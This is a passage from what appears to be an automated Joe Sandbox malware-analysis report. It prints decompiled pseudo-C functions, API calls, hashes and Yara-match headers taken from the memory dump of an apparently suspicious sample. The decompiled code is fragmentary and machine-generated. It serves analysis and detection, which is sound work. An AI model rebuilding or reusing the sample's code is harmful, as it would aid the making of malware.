			}










                                                          0x0041a692
                                                          0x0041a694
                                                          0x0041a699
                                                          0x0041a69b
                                                          0x0041a6a1
                                                          0x0041a6b2
                                                          0x0041a6c8
                                                          0x0041a6c8
                                                          0x0041a62d
                                                          0x0041a634
                                                          0x0041a637
                                                          0x0041a642
                                                          0x0041a64d
                                                          0x0041a651

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateExitHeapProcess
                                                          • String ID: &EA
                                                          • API String ID: 1054155344-1330915590
                                                          • Opcode ID: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                                                          • Instruction ID: d00da0fc24fa43dfddb9da27cb984b5bb85f809a5ccfa62c29cf1a0df3718626
                                                          • Opcode Fuzzy Hash: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                                                          • Instruction Fuzzy Hash: BCF0AFB91042406FD710EF78CC91EEB7BA8AF48354F148599FC5C5B346C231E9158AA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 13 41a620-41a651 call 41af50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &EA
                                                          • API String ID: 1279760036-1330915590
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 211 408309-40830b 212 408339-40835a call 40ace0 call 414e40 211->212 213 40830d-408336 call 41be50 call 41c9f0 211->213 222 40835c-40836e PostThreadMessageW 212->222 223 40838e-408392 212->223 213->212 224 408370-40838a call 40a470 222->224 225 40838d 222->225 224->225 225->223
                                                          C-Code - Quality: 67%
                                                          			E00408309(void* __ebx, void* __eflags, intOrPtr _a4, long _a12) {
				char _v67;
				char _v68;
				void* _t11;
				int _t12;
				char* _t21;
				long _t23;
				intOrPtr _t25;
				int _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t35;

				_t36 = __eflags;
				asm("in al, 0x42");
				if(__eflags == 0) {
					_t1 = __ebx - 0x1374aa47;
					_t35 =  *_t1;
					 *_t1 = _t31;
					_push(_t29);
					_t29 = _t35;
					_t31 = _t35 - 0x40;
					_push(_t25);
					_v68 = 0;
					E0041BE50( &_v67, 0, 0x3f);
					E0041C9F0( &_v68, 3);
					_t25 = _a4;
					_t21 =  &_v68;
				}
				_t11 = E0040ACE0(_t36, _t25 + 0x1c, _t21); // executed
				_t12 = E00414E40(_t25 + 0x1c, _t11, 0, 0, 0xc4e7b6d6);
				_t27 = _t12;
				if(_t27 != 0) {
					_t23 = _a12;
					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t38 = _t12;
					if(_t12 == 0) {
						_t12 =  *_t27(_t23, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t12);
					}
				}
				return _t12;
			}














                                                          0x00408309
                                                          0x00408309
                                                          0x0040830b
                                                          0x0040830d
                                                          0x0040830d
                                                          0x0040830d
                                                          0x00408310
                                                          0x00408311
                                                          0x00408313
                                                          0x00408316
                                                          0x0040831f
                                                          0x00408323
                                                          0x0040832e
                                                          0x00408333
                                                          0x00408336
                                                          0x00408336
                                                          0x0040833e
                                                          0x0040834e
                                                          0x00408353
                                                          0x0040835a
                                                          0x0040835d
                                                          0x0040836a
                                                          0x0040836c
                                                          0x0040836e
                                                          0x0040838b
                                                          0x0040838b
                                                          0x0040838d
                                                          0x00408392

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 757677ac8006fff5808dbb0f83c71857243fa7dba392e7765e98395b4de22cb4
                                                          • Instruction ID: c60474528973503b6e3d4f7b1e86d2aa81c484ba3d6bcd3f995390e9496bdaf8
                                                          • Opcode Fuzzy Hash: 757677ac8006fff5808dbb0f83c71857243fa7dba392e7765e98395b4de22cb4
                                                          • Instruction Fuzzy Hash: 2801B571A80328B7EB21A6558D43FFF772CAB40B54F04412EFF04BA1C1DAB9690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9f0 call 40ace0 call 414e40 228->229 230 408323 call 41be50 228->230 238 40835c-40836e PostThreadMessageW 229->238 239 40838e-408392 229->239 230->229 240 408370-40838a call 40a470 238->240 241 40838d 238->241 240->241 241->239
                                                          C-Code - Quality: 82%
                                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t23 = _a4;
				_t12 = E0040ACE0(_t30, _t23 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                          0x00408310
                                                          0x0040831f
                                                          0x00408323
                                                          0x0040832e
                                                          0x00408333
                                                          0x0040833e
                                                          0x0040834e
                                                          0x00408353
                                                          0x0040835a
                                                          0x0040835d
                                                          0x0040836a
                                                          0x0040836c
                                                          0x0040836e
                                                          0x0040838b
                                                          0x0040838b
                                                          0x00000000
                                                          0x0040838d
                                                          0x00408392

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                          • Opcode Fuzzy Hash: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 268 41a652-41a677 call 41af50 270 41a67c-41a691 RtlFreeHeap 268->270
                                                          C-Code - Quality: 100%
                                                          			E0041A652(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t17;

				 *0x55ce523e = 0xe128aff2;
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E0041AF50(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                                                          0x0041a65c
                                                          0x0041a663
                                                          0x0041a66f
                                                          0x0041a677
                                                          0x0041a68d
                                                          0x0041a691

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                                                          • Instruction ID: f5a133981db5de69143246aa9e779778ced1e27caef6fa814550706276b7310b
                                                          • Opcode Fuzzy Hash: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                                                          • Instruction Fuzzy Hash: 97E06DB12142046FD714DF98DC44E9B3768AF48310F004549F90C5B242C630ED14CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 274 41a660-41a676 275 41a67c-41a691 RtlFreeHeap 274->275 276 41a677 call 41af50 274->276 276->275
                                                          C-Code - Quality: 100%
                                                          			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x0041a66f
                                                          0x0041a677
                                                          0x0041a68d
                                                          0x0041a691

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x0041a7da
                                                          0x0041a7f0
                                                          0x0041a7f4

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040ACD3 Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E0040ACD3(void* __ebx, signed char _a8) {
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v536;
				struct _OBJDIR_INFORMATION _t14;
				void* _t20;
				struct _OBJDIR_INFORMATION _t22;
				struct _EXCEPTION_RECORD _t28;
				void* _t31;
				void* _t34;
				void* _t38;

				if(__ebx > __ebx) {
					L8:
					asm("cld");
					_t14 = E0041B490(_t28);
					_v12 = _t14;
					__eflags = _t14;
					if(_t14 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t14 = _v12;
					}
					return _t14;
				} else {
					asm("invalid");
					asm("enter 0x854a, 0xc5");
					_push(_t31);
					_t31 = _t34;
					_t26 = _a8;
					_v8 =  &_v536;
					_t20 = E0041CC40( &_v12, 0x104, _a8);
					_t38 = _t34 - 0x214 + 0xc;
					if(_t20 != 0) {
						_push(_v8);
						_t22 = E0041D060(_t26, __eflags);
						_t34 = _t38 + 4;
						__eflags = _t22;
						if(_t22 != 0) {
							E0041D2E0( &_v12, 0);
							_t34 = _t34 + 8;
						}
						_t28 = _v8;
						goto L8;
					} else {
						return _t20;
					}
				}
			}













                                                          0x0040acd5
                                                          0x0040ad2f
                                                          0x0040ad2f
                                                          0x0040ad31
                                                          0x0040ad39
                                                          0x0040ad3c
                                                          0x0040ad3e
                                                          0x0040ad52
                                                          0x0040ad54
                                                          0x0040ad54
                                                          0x0040ad5a
                                                          0x0040acd7
                                                          0x0040acd7
                                                          0x0040acd9
                                                          0x0040ace0
                                                          0x0040ace1
                                                          0x0040ace9
                                                          0x0040acfc
                                                          0x0040acff
                                                          0x0040ad04
                                                          0x0040ad09
                                                          0x0040ad12
                                                          0x0040ad13
                                                          0x0040ad18
                                                          0x0040ad1b
                                                          0x0040ad1d
                                                          0x0040ad25
                                                          0x0040ad2a
                                                          0x0040ad2a
                                                          0x0040ad2d
                                                          0x00000000
                                                          0x0040ad0b
                                                          0x0040ad0e
                                                          0x0040ad0e
                                                          0x0040ad09

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction ID: 0100dda9211f4f49bdda9a44b065ce2ab9e5eac326fa31b3b38c2924a80330d7
                                                          • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction Fuzzy Hash: DCE04FB5E0010EAAEB00DAA4D841F9EB374EB48309F008195A91897640E634EA548B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                          0x0041a6a3
                                                          0x0041a6ba
                                                          0x0041a6c8

                                                          APIs
                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 009A419C Relevance: 78.5, APIs: 52, Instructions: 492COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E009A419C(signed int __eax, void* __ecx, void* __edx, void* __edi, signed int __esi) {
				void* __ebx;
				signed int _t183;
				intOrPtr* _t187;
				signed int _t268;
				void* _t269;
				void* _t272;
				void* _t274;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t340;

				_t272 = __edx;
				 *((intOrPtr*)(_t332 - 0x17af07bb)) =  *((intOrPtr*)(_t332 - 0x17af07bb)) + __ecx;
				_t274 = __edi +  *((intOrPtr*)(__edx - 0x3b7c0001));
				_push(__eax);
				_t277 = __esi | __eax;
				_t278 = _t277 | E009B4CB1(_t269, _t274, _t277, _t332 - 8, 1, _t269, 0x41, _t274 + 0x8c);
				_t279 = _t278 | E009B4CB1(_t269, _t274, _t278, _t332 - 8, 1, _t269, 0x42, _t274 + 0x90);
				_t280 = _t279 | E009B4CB1(_t269, _t274, _t279, _t332 - 8, 1, _t269, 0x43, _t274 + 0x94);
				_t281 = _t280 | E009B4CB1(_t269, _t274, _t280, _t332 - 8, 1, _t269, 0x28, _t274 + 0x98);
				_t282 = _t281 | E009B4CB1(_t269, _t274, _t281, _t332 - 8, 1, _t269, 0x29, _t274 + 0x9c);
				_t283 = _t282 | E009B4CB1(_t269, _t274, _t282, _t332 - 8, 1, _t269, 0x1f, _t274 + 0xa0);
				_t284 = _t283 | E009B4CB1(_t269, _t274, _t283, _t332 - 8, 1, _t269, 0x20, _t274 + 0xa4);
				_t285 = _t284 | E009B4CB1(_t269, _t274, _t284, _t332 - 8, 1, _t269, 0x1003, _t274 + 0xa8);
				_t286 = _t285 | E009B4CB1(_t269, _t274, _t285, _t332 - 8, 0, _t269, 0x1009, _t274 + 0xac);
				_t287 = _t286 | E009B4CB1(_t269, _t274, _t286, _t332 - 8, 2, _t269, 0x31, _t274 + 0xb8);
				_t288 = _t287 | E009B4CB1(_t269, _t274, _t287, _t332 - 8, 2, _t269, 0x32, _t274 + 0xbc);
				_t289 = _t288 | E009B4CB1(_t269, _t274, _t288, _t332 - 8, 2, _t269, 0x33, _t274 + 0xc0);
				_t290 = _t289 | E009B4CB1(_t269, _t274, _t289, _t332 - 8, 2, _t269, 0x34, _t274 + 0xc4);
				_t291 = _t290 | E009B4CB1(_t269, _t274, _t290, _t332 - 8, 2, _t269, 0x35, _t274 + 0xc8);
				_t292 = _t291 | E009B4CB1(_t269, _t274, _t291, _t332 - 8, 2, _t269, 0x36, _t274 + 0xcc);
				_t293 = _t292 | E009B4CB1(_t269, _t274, _t292, _t332 - 8, 2, _t269, 0x37, _t274 + 0xb4);
				_t294 = _t293 | E009B4CB1(_t269, _t274, _t293, _t332 - 8, 2, _t269, 0x2a, _t274 + 0xd4);
				_t295 = _t294 | E009B4CB1(_t269, _t274, _t294, _t332 - 8, 2, _t269, 0x2b, _t274 + 0xd8);
				_t296 = _t295 | E009B4CB1(_t269, _t274, _t295, _t332 - 8, 2, _t269, 0x2c, _t274 + 0xdc);
				_t297 = _t296 | E009B4CB1(_t269, _t274, _t296, _t332 - 8, 2, _t269, 0x2d, _t274 + 0xe0);
				_t298 = _t297 | E009B4CB1(_t269, _t274, _t297, _t332 - 8, 2, _t269, 0x2e, _t274 + 0xe4);
				_t299 = _t298 | E009B4CB1(_t269, _t274, _t298, _t332 - 8, 2, _t269, 0x2f, _t274 + 0xe8);
				_t300 = _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0);
				_t183 = E009B4CB1(_t269, _t274, _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0), _t332 - 8, 2, _t269, 0x44, _t274 + 0xec);
				_t340 = _t334 + 0x1e0;
				E009B4CB1(_t269, _t274, _t300 | _t183, _t332 - 8, 2, _t269, 0x45, _t274 + 0xf0);
				_t187 = _t274 + 0xf4;
				 *_t187 =  *_t187 + _t187;
				 *((intOrPtr*)(_t187 + 0x6a)) =  *((intOrPtr*)(_t187 + 0x6a)) + _t272;
				_t304 = _t340 + 1;
				_push(_t269);
				_push(2);
				_push(_t332 - 8);
				_t305 = _t304 | E009B4CB1(_t269, _t274, _t304);
				_t306 = _t305 | E009B4CB1(_t269, _t274, _t305, _t332 - 8, 2, _t269, 0x47, _t274 + 0xf8);
				_t307 = _t306 | E009B4CB1(_t269, _t274, _t306, _t332 - 8, 2, _t269, 0x48, _t274 + 0xfc);
				_t308 = _t307 | E009B4CB1(_t269, _t274, _t307, _t332 - 8, 2, _t269, 0x49, _t274 + 0x100);
				_t309 = _t308 | E009B4CB1(_t269, _t274, _t308, _t332 - 8, 2, _t269, 0x4a, _t274 + 0x104);
				_t310 = _t309 | E009B4CB1(_t269, _t274, _t309, _t332 - 8, 2, _t269, 0x4b, _t274 + 0x108);
				_t311 = _t310 | E009B4CB1(_t269, _t274, _t310, _t332 - 8, 2, _t269, 0x4c, _t274 + 0x10c);
				_t312 = _t311 | E009B4CB1(_t269, _t274, _t311, _t332 - 8, 2, _t269, 0x4d, _t274 + 0x110);
				_t313 = _t312 | E009B4CB1(_t269, _t274, _t312, _t332 - 8, 2, _t269, 0x4e, _t274 + 0x114);
				_t314 = _t313 | E009B4CB1(_t269, _t274, _t313, _t332 - 8, 2, _t269, 0x4f, _t274 + 0x118);
				_t315 = _t314 | E009B4CB1(_t269, _t274, _t314, _t332 - 8, 2, _t269, 0x38, _t274 + 0x11c);
				_t316 = _t315 | E009B4CB1(_t269, _t274, _t315, _t332 - 8, 2, _t269, 0x39, _t274 + 0x120);
				_t317 = _t316 | E009B4CB1(_t269, _t274, _t316, _t332 - 8, 2, _t269, 0x3a, _t274 + 0x124);
				_t318 = _t317 | E009B4CB1(_t269, _t274, _t317, _t332 - 8, 2, _t269, 0x3b, _t274 + 0x128);
				_t319 = _t318 | E009B4CB1(_t269, _t274, _t318, _t332 - 8, 2, _t269, 0x3c, _t274 + 0x12c);
				_t320 = _t319 | E009B4CB1(_t269, _t274, _t319, _t332 - 8, 2, _t269, 0x3d, _t274 + 0x130);
				_t321 = _t320 | E009B4CB1(_t269, _t274, _t320, _t332 - 8, 2, _t269, 0x3e, _t274 + 0x134);
				_t322 = _t321 | E009B4CB1(_t269, _t274, _t321, _t332 - 8, 2, _t269, 0x3f, _t274 + 0x138);
				_t323 = _t322 | E009B4CB1(_t269, _t274, _t322, _t332 - 8, 2, _t269, 0x40, _t274 + 0x13c);
				_t324 = _t323 | E009B4CB1(_t269, _t274, _t323, _t332 - 8, 2, _t269, 0x41, _t274 + 0x140);
				_t325 = _t324 | E009B4CB1(_t269, _t274, _t324, _t332 - 8, 2, _t269, 0x42, _t274 + 0x144);
				_t326 = _t325 | E009B4CB1(_t269, _t274, _t325, _t332 - 8, 2, _t269, 0x43, _t274 + 0x148);
				_t327 = _t326 | E009B4CB1(_t269, _t274, _t326, _t332 - 8, 2, _t269, 0x28, _t274 + 0x14c);
				_t328 = _t327 | E009B4CB1(_t269, _t274, _t327, _t332 - 8, 2, _t269, 0x29, _t274 + 0x150);
				_t329 = _t328 | E009B4CB1(_t269, _t274, _t328, _t332 - 8, 2, _t269, 0x1f, _t274 + 0x154);
				_t330 = _t329 | E009B4CB1(_t269, _t274, _t329, _t332 - 8, 2, _t269, 0x20, _t274 + 0x158);
				_t268 = E009B4CB1(_t269, _t274, _t330, _t332 - 8, 2, _t269, 0x1003, _t274 + 0x15c) | _t330;
				return _t268;
			}































































                                                          0x009a419c
                                                          0x009b92a4
                                                          0x009b92aa
                                                          0x009b92b0
                                                          0x009b92b1
                                                          0x009b92c8
                                                          0x009b92df
                                                          0x009b92f6
                                                          0x009b9310
                                                          0x009b9327
                                                          0x009b933e
                                                          0x009b9355
                                                          0x009b9372
                                                          0x009b938c
                                                          0x009b93a3
                                                          0x009b93ba
                                                          0x009b93d4
                                                          0x009b93eb
                                                          0x009b9402
                                                          0x009b9419
                                                          0x009b9433
                                                          0x009b944a
                                                          0x009b9461
                                                          0x009b9478
                                                          0x009b9492
                                                          0x009b94a9
                                                          0x009b94c0
                                                          0x009b94d7
                                                          0x009b94e9
                                                          0x009b94ee
                                                          0x009b9503
                                                          0x009b950a
                                                          0x009b950d
                                                          0x009b950f
                                                          0x009b9512
                                                          0x009b9513
                                                          0x009b9517
                                                          0x009b9519
                                                          0x009b951f
                                                          0x009b9536
                                                          0x009b9550
                                                          0x009b9567
                                                          0x009b957e
                                                          0x009b9595
                                                          0x009b95af
                                                          0x009b95c6
                                                          0x009b95dd
                                                          0x009b95f4
                                                          0x009b960e
                                                          0x009b9625
                                                          0x009b963c
                                                          0x009b9653
                                                          0x009b966d
                                                          0x009b9684
                                                          0x009b969b
                                                          0x009b96b2
                                                          0x009b96cc
                                                          0x009b96e3
                                                          0x009b96fa
                                                          0x009b9711
                                                          0x009b972b
                                                          0x009b9742
                                                          0x009b9759
                                                          0x009b9770
                                                          0x009b978d
                                                          0x009b9795

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
